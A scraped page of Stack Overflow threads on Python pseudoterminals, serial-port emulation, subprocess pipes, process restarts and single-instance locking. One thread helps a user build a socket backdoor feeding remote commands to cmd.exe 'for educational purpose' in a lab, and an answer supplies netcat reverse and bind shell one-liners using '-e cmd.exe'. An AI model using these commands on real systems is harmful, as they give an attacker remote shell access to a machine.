Pseudoterminal master reads what it has just written - python

I'm working on a project that interfaces "virtual devices" (python processes) that use serial port connections with real devices that also use serial ports, and I'm using pseudoterminals to connect several(more than 2) of these serial-port communications processes (modeling serial devices) together, and I've hit a bit of a snag.
I've got a python process that generates pseudoterminals, symlinks the slave end of the pty to a file (so the processes can create a pyserial object to the filename), while the master ends are kept by my pty generating process and read; when data comes in on one master, the data is logged and then written to the other masters. This approach works if the listening process is always there.
The problem is when the virtual device dies or is never started (which is a valid use case for this project). On my system, it seems, that if data is written to a master end of a pty, if there is nothing listening to the slave end, calling read on that master will return the data that was just written! This means that devices receive the same data more than once -- not good!
Example:
>>master, slave = pty.openpty()
>>os.write(master,"Hello!")
6
>>os.read(master,6)
'Hello!'
I would prefer that the call to read() block until the slave sends data. In fact, this is the behavior of the slave device -- it can write, and then os.read(slave,1) will block until the master writes data.
My "virtual devices" need to be able to pass a filename to open a serial port object; I've attempted to symlink the master end, but that causes my virtual devices to open /dev/ptmx, which creates a new pseudoterminal pair instead of linking back to the slaves that already exist!
Is there any way to change the behavior of the master? Or even just get a filename to the master that corresponds to a slave device (not just /dev/ptmx)?
Thanks in advance!

I'm pretty sure this is because echoing is on by default. To borrow from the Python termios docs, you could do:
master, slave = os.openpty() # It's preferred to use os.openpty()
old_settings = termios.tcgetattr(master)
new_settings = termios.tcgetattr(master) # Does this to avoid modifying a reference that also modifies old_settings
new_settings[3] = new_settings[3] & ~termios.ECHO
termios.tcsetattr(master, termios.TCSADRAIN, new_settings)
You can use the following to restore the old settings:
termios.tcsetattr(master, termios.TCSADRAIN, old_settings)

In case someone finds this question, and jszakmeister's answer doesn't work, here is what worked for me.
openpty seems to create pty's in canonical mode with echo turned on. This is not what one might expect. You can change the mode using the tty.setraw function, like in this example of a simple openpty echo server:
master, slave = os.openpty()
tty.setraw(master, termios.TCSANOW)
print("Connect to:", os.ttyname(slave))
while True:
try:
data = os.read(master, 10000)
except OSError:
break
if not data:
break
os.write(master, data)

Related

Python : http.server.HTTPServer : How to close ALL opened files?

So basically, I am making an HTTP webhooks server in Python 3 and wanted to add a restart function because shell access is very limited on the server it will be running on.
I found this snippet somewhere on Stack Overflow earlier:
def restart_program():
"""Restarts the current program, with file objects and descriptors
cleanup
"""
try:
p = psutil.Process(os.getpid())
fds = p.open_files() + p.connections()
print (fds)
for handler in fds:
os.close(handler.fd)
except Exception as e:
logging.error(e)
python = sys.executable
os.execl(python, python, *sys.argv)
For the most part, it works, but I wanted to make sure so I ran a few tests with lsof and found that every time I restarted the server, two more lines (files) were added to the list of open files:
python3 13923 darwin 5u systm 0x18cd0c0bebdcbfd7 0t0 [ctl com.apple.netsrc id 9 unit 36]
python3 13923 darwin 6u unix 0x18cd0c0beb8fc95f 0t0 ->0x18cd0c0beb8fbcdf
(the adresses varying each restart)
These are only present when I initiate httpd = ThreadingSimpleServer((host, port), Handler). But even after I call httpd.server_close() these open files persist and psutil doesn't seem to find them.
This isn't really required feature. If this proves to be too much overhead I can drop it, but right now I am only interested in why my code doesn't work and a solution for my own sanity.
Thanks in advance!
UPDATE:
Changing p.connections() to p.connections(kind='all') got me the unix type fd. Still not sure how to close the systm type fd. Turns out the unix fd had to do with DNS...
UPDATE:
Well, it looks like I found a solution, however messy it may be.
class MyFileHandler(object):
"""docstring for MyFileHandler."""
def __init__(self, fd):
super(MyFileHandler, self).__init__()
self.fd = fd
def get_open_systm_files(pid=os.getpid()):
proc = subprocess.Popen(['lsof', '-p', str(pid)], stdout=subprocess.PIPE)
return [MyFileHandler(int(str(l).split(' ')[6][:-1])) for l in proc.stdout.readlines() if b'systm' in l]
def restart_program():
"""Restarts the current program, with file objects and descriptors
cleanup
"""
try:
p = psutil.Process(os.getpid())
fds = p.open_files() + p.connections()
print (fds)
for handler in fds:
os.close(handler.fd)
except Exception as e:
logging.error(e)
python = sys.executable
os.execl(python, python, *sys.argv)
It's not pretty, but it works.
If anyone could shed some light on what actually is/was going on I would very much like to know.
Mmm that looks like a very hackish way to restart a process and a bad idea in general. What is your use case? Why do you want to restart a process to begin with? Regardless from your motivations, the usual way to interact with processes in that sense is via signals. I am not aware of signals designed specifically to restart a process though. What you usually want to do is terminate it (SIGTERM) and maybe have something like systemd or zdaemon which will automatically restart it. You can even write a signal handler to execute cleanup functions on SIGTERM, and that is the correct way to do cleaning up. You don't usually want to restart a process though, let alone do it from the app itself. That looks like a recipe for troubles.

Python os.read blocks until newline character

I have an XBee plugged into a Raspberry PI. Here is the Python 3.4 code I am using:
f = os.open("/dev/ttyUSB0", os.O_RDWR | os.O_NONBLOCK)
print("Writing...")
b = bytes("hello","utf-8")
os.write(f,b)
print("Press return to start read")
cmd = input()
print("Reading...")
ret = os.read(f,10)
if ret == None:
print("ret = None")
else:
print("ret = {}".format(ret))
os.close(f)
Yesterday, this all worked as I expected. The read command returned immediately, with zero bytes if there wasn't anything to read.
Today I added code to another part of the project that writes to a text file and includes a thread RLock. Now the above code does something different. If there are no bytes waiting to be read, or there are bytes waiting to be read but they don't end with an 0x0D, I get an error:
BlockingIOError: [Errno 11] Resource temporarily unavailable
But is there are bytes waiting to be read that end with an 0x0D, the read function returns those bytes including the 0x0D.
Update: I have reformated the system, and the fault has not gone away, which suggests it wasn't the addition of the file and thread locking code that caused the problem.
I ran minicom and the problem has gone away, so maybe I should be doing something with serial configuration on the device before I open it as a file?
This is the line that returns the os.read to its original behaviour:
minicom -b 9600 -o -D /dev/ttyUSB0
I strongly suspect that the two different behaviours are related to the CTS/RTS flow control settings on the serial port. Try turning CTS/RTS on or off to get the behaviour you want.

python subprocess stdin.write a string error 22 invalid argument

i have two python files communicating with socket. when i pass the data i took to stdin.write i have error 22 invalid argument. the code
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = s.recv(1024) # s is the socket i created
proc.stdin.write(data) ##### ERROR in this line
output = proc.stdout.readline()
print output.rstrip()
remainder = proc.communicate()[0]
print remainder
Update
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab. this is for educational purpose. i have two machines. 1) is running ubuntu and i have the in server this code:
import socket,sys
s=socket.socket()
host = "192.168.2.7" #the servers ip
port = 1234
s.bind((host, port))
s.listen(1) #wait for client connection.
c, addr = s.accept() # Establish connection with client.
print 'Got connection from', addr
c.send('Thank you for connecting')
while True:
command_from_user = raw_input("Give your command: ") #read command from the user
if command_from_user == 'quit': break
c.send(command_from_user) #sending the command to client
c.close() # Close the connection
have this code for the client:
import socket
import sys
import subprocess, os
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
host = "192.168.2.7" #ip of the server machine
port = 1234
s.connect((host,port)) #open a TCP connection to hostname on the port
print s.recv(1024)
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
while True:
data = s.recv(1024)
if (data == "") or (data=="quit"):
break
proc.stdin.write('%s\n' % data)
proc.stdin.flush()
remainder = proc.communicate()[0]
print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
s.close #closing the socket
and the error is in the client file
Traceback (most recent call last): File "ex1client2.py", line 50, in proc.stdin.write('%s\n' % data) ValueError: I/O operation on closed file
basically i want to run serial commands from the server to the client and get the output back in the server. the first command is executed, the second command i get this error message.
The main problem which led me to this solution is with chanhing directory command. when i excecute cd "path" it doesn't change.
Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:
while True:
data = s.recv(1024)
if (data == "") or (data=="quit"):
break
proc.stdin.write('%s\n' % data)
proc.stdin.flush()
remainder = proc.communicate()[0]
print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
The problem is that each time through this list, you're calling proc.communicate(). As the docs explain, this will:
Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.
So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means exactly what it says.
If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.
On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.
The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of C:\python27\Tools rather than C:\Users\me\Documents.
But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a select, because the pipes aren't sockets. So, the only real option is to create a reader thread for stdout and another one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.
If you look at the source to communicate, you can see how the threading should work.
Meanwhile, as a side note, your code has another very serious problem. You're expecting that each s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.
On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.
So, you have to implement some kind of protocol that delimits messages in some way.
Fortunately, for simple cases, Python gives you a very easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:
while True:
data = s.recv(1024)
… just do this:
f = s.makefile()
while True:
data = f.readline()
You just need to remember to close both f and s later (or s right after the makefile, and f later). A more idiomatic use is:
with s.makefile() as f:
s.close()
for data in f:
One last thing:
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab
"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.
If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with apt-get netcat or apt-get nc. Windows doesn't come with anything, but you can get ports of almost any variant.
A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.
The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your "backyard server" listens forever—you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.
But the other way around, with a backyard client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:
nc -l -p 1234
Then on your Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:
nc -e cmd.exe 192.168.2.7 1234
That's it. A lot simpler than writing it in Python.
For the more typical design, the backdoor server on Windows runs this:
nc -k -l -p 1234 -e cmd.exe
And then you connect up from Ubuntu with:
nc windows.machine.address 1234
Or you can even add -t to the backdoor server, and just connect up with telnet instead of nc.
The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an EPIPE here, but on Windows, subprocess isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get some error.)
And the reason that happens is that you're trying to open a program named '\n' (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named '\n.exe' or the like on your path.
This would be much easier to see if you weren't using shell=True. In that case, the Popen itself would raise an exception (an ENOENT), which would tell you something like:
OSError: [Errno 2] No such file or directory: '
'
… which would be much easier to understand.
In general, you should not be using shell=True unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.
It would also be less confusing if you didn't reuse data to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).

Virtual Serial Device in Python?

I know that I can use e.g. pySerial to talk to serial devices, but what if I don't have a device right now but still need to write a client for it? How can I write a "virtual serial device" in Python and have pySerial talk to it, like I would, say, run a local web server? Maybe I'm just not searching well, but I've been unable to find any information on this topic.
this is something I did and worked out for me so far:
import os, pty, serial
master, slave = pty.openpty()
s_name = os.ttyname(slave)
ser = serial.Serial(s_name)
# To Write to the device
ser.write('Your text')
# To read from the device
os.read(master,1000)
If you create more virtual ports you will have no problems as the different masters get different file descriptors even if they have the same name.
If you are running Linux you can use the socat command for this, like so:
socat -d -d pty,raw,echo=0 pty,raw,echo=0
When the command runs, it will inform you of which serial ports it has created. On my machine this looks like:
2014/04/23 15:47:49 socat[31711] N PTY is /dev/pts/12
2014/04/23 15:47:49 socat[31711] N PTY is /dev/pts/13
2014/04/23 15:47:49 socat[31711] N starting data transfer loop with FDs [3,3] and [5,5]
Now I can write to /dev/pts/13 and receive on /dev/pts/12, and vice versa.
I was able to emulate an arbitrary serial port ./foo using this code:
SerialEmulator.py
import os, subprocess, serial, time
# this script lets you emulate a serial device
# the client program should use the serial port file specifed by client_port
# if the port is a location that the user can't access (ex: /dev/ttyUSB0 often),
# sudo is required
class SerialEmulator(object):
def __init__(self, device_port='./ttydevice', client_port='./ttyclient'):
self.device_port = device_port
self.client_port = client_port
cmd=['/usr/bin/socat','-d','-d','PTY,link=%s,raw,echo=0' %
self.device_port, 'PTY,link=%s,raw,echo=0' % self.client_port]
self.proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(1)
self.serial = serial.Serial(self.device_port, 9600, rtscts=True, dsrdtr=True)
self.err = ''
self.out = ''
def write(self, out):
self.serial.write(out)
def read(self):
line = ''
while self.serial.inWaiting() > 0:
line += self.serial.read(1)
print line
def __del__(self):
self.stop()
def stop(self):
self.proc.kill()
self.out, self.err = self.proc.communicate()
socat needs to be installed (sudo apt-get install socat), as well as the pyserial python package (pip install pyserial).
Open the python interpreter and import SerialEmulator:
>>> from SerialEmulator import SerialEmulator
>>> emulator = SerialEmulator('./ttydevice','./ttyclient')
>>> emulator.write('foo')
>>> emulator.read()
Your client program can then wrap ./ttyclient with pyserial, creating the virtual serial port. You could also make client_port /dev/ttyUSB0 or similar if you can't modify client code, but might need sudo.
Also be aware of this issue: Pyserial does not play well with virtual port
It may be easier to using something like com0com (if you're on Windows) to set up a virtual serial port, and develop on that.
Maybe a loop device will do the job if you need to test your application without access to a device. It's included in pySerial 2.5 https://pythonhosted.org/pyserial/url_handlers.html#loop
It depends a bit on what you're trying to accomplish now...
You could wrap access to the serial port in a class and write an implementation to use socket I/O or file I/O. Then write your serial I/O class to use the same interface and plug it in when the device is available. (This is actually a good design for testing functionality without requiring external hardware.)
Or, if you are going to use the serial port for a command line interface, you could use stdin/stdout.
Or, there's this other answer about virtual serial devices for linux.

Ensure a single instance of an application in Linux

I'm working on a GUI application in WxPython, and I am not sure how I can ensure that only one copy of my application is running at any given time on the machine. Due to the nature of the application, running more than once doesn't make any sense, and will fail quickly. Under Win32, I can simply make a named mutex and check that at startup. Unfortunately, I don't know of any facilities in Linux that can do this.
I'm looking for something that will automatically be released should the application crash unexpectedly. I don't want to have to burden my users with having to manually delete lock files because I crashed.
The Right Thing is advisory locking using flock(LOCK_EX); in Python, this is found in the fcntl module.
Unlike pidfiles, these locks are always automatically released when your process dies for any reason, have no race conditions exist relating to file deletion (as the file doesn't need to be deleted to release the lock), and there's no chance of a different process inheriting the PID and thus appearing to validate a stale lock.
If you want unclean shutdown detection, you can write a marker (such as your PID, for traditionalists) into the file after grabbing the lock, and then truncate the file to 0-byte status before a clean shutdown (while the lock is being held); thus, if the lock is not held and the file is non-empty, an unclean shutdown is indicated.
Complete locking solution using the fcntl module:
import fcntl
pid_file = 'program.pid'
fp = open(pid_file, 'w')
try:
fcntl.lockf(fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
# another instance is running
sys.exit(1)
There are several common techniques including using semaphores. The one I see used most often is to create a "pid lock file" on startup that contains the pid of the running process. If the file already exists when the program starts up, open it up and grab the pid inside, check to see if a process with that pid is running, if it is check the cmdline value in /proc/pid to see if it is an instance of your program, if it is then quit, otherwise overwrite the file with your pid. The usual name for the pid file is application_name.pid.
wxWidgets offers a wxSingleInstanceChecker class for this purpose: wxPython doc, or wxWidgets doc. The wxWidgets doc has sample code in C++, but the python equivalent should be something like this (untested):
name = "MyApp-%s" % wx.GetUserId()
checker = wx.SingleInstanceChecker(name)
if checker.IsAnotherRunning():
return False
This builds upon the answer by user zgoda. It mainly addresses a tricky concern having to do with write access to the lock file. In particular, if the lock file was first created by root, another user foo can then no successfully longer attempt to rewrite this file due to an absence of write permissions for user foo. The obvious solution seems to be to create the file with write permissions for everyone. This solution also builds upon a different answer by me, having to do creating a file with such custom permissions. This concern is important in the real world where your program may be run by any user including root.
import fcntl, os, stat, tempfile
app_name = 'myapp' # <-- Customize this value
# Establish lock file settings
lf_name = '.{}.lock'.format(app_name)
lf_path = os.path.join(tempfile.gettempdir(), lf_name)
lf_flags = os.O_WRONLY | os.O_CREAT
lf_mode = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH # This is 0o222, i.e. 146
# Create lock file
# Regarding umask, see https://stackoverflow.com/a/15015748/832230
umask_original = os.umask(0)
try:
lf_fd = os.open(lf_path, lf_flags, lf_mode)
finally:
os.umask(umask_original)
# Try locking the file
try:
fcntl.lockf(lf_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
msg = ('Error: {} may already be running. Only one instance of it '
'can run at a time.'
).format('appname')
exit(msg)
A limitation of the above code is that if the lock file already existed with unexpected permissions, those permissions will not be corrected.
I would've liked to use /var/run/<appname>/ as the directory for the lock file, but creating this directory requires root permissions. You can make your own decision for which directory to use.
Note that there is no need to open a file handle to the lock file.
Here's the TCP port-based solution:
# Use a listening socket as a mutex against multiple invocations
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 5080))
s.listen(1)
Look for a python module that interfaces to SYSV semaphores on unix. The semaphores have a SEM_UNDO flag which will cause the resources held by the a process to be released if the process crashes.
Otherwise as Bernard suggested, you can use
import os
os.getpid()
And write it to /var/run/application_name.pid. When the process starts, it should check if the pid in /var/run/application_name.pid is listed in the ps table and quit if it is, otherwise write its own pid into /var/run/application_name.pid. In the following var_run_pid is the pid you read from /var/run/application_name.pid
cmd = "ps -p %s -o comm=" % var_run_pid
app_name = os.popen(cmd).read().strip()
if len(app_name) > 0:
Already running
The set of functions defined in semaphore.h -- sem_open(), sem_trywait(), etc -- are the POSIX equivalent, I believe.
If you create a lock file and put the pid in it, you can check your process id against it and tell if you crashed, no?
I haven't done this personally, so take with appropriate amounts of salt. :p
Can you use the 'pidof' utility? If your app is running, pidof will write the Process ID of your app to stdout. If not, it will print a newline (LF) and return an error code.
Example (from bash, for simplicity):
linux# pidof myapp
8947
linux# pidof nonexistent_app
linux#
By far the most common method is to drop a file into /var/run/ called [application].pid which contains only the PID of the running process, or parent process.
As an alternative, you can create a named pipe in the same directory to be able to send messages to the active process, e.g. to open a new file.
I've made a basic framework for running these kinds of applications when you want to be able to pass the command line arguments of subsequent attempted instances to the first one. An instance will start listening on a predefined port if it does not find an instance already listening there. If an instance already exists, it sends its command line arguments over the socket and exits.
code w/ explanation

Categories

Resources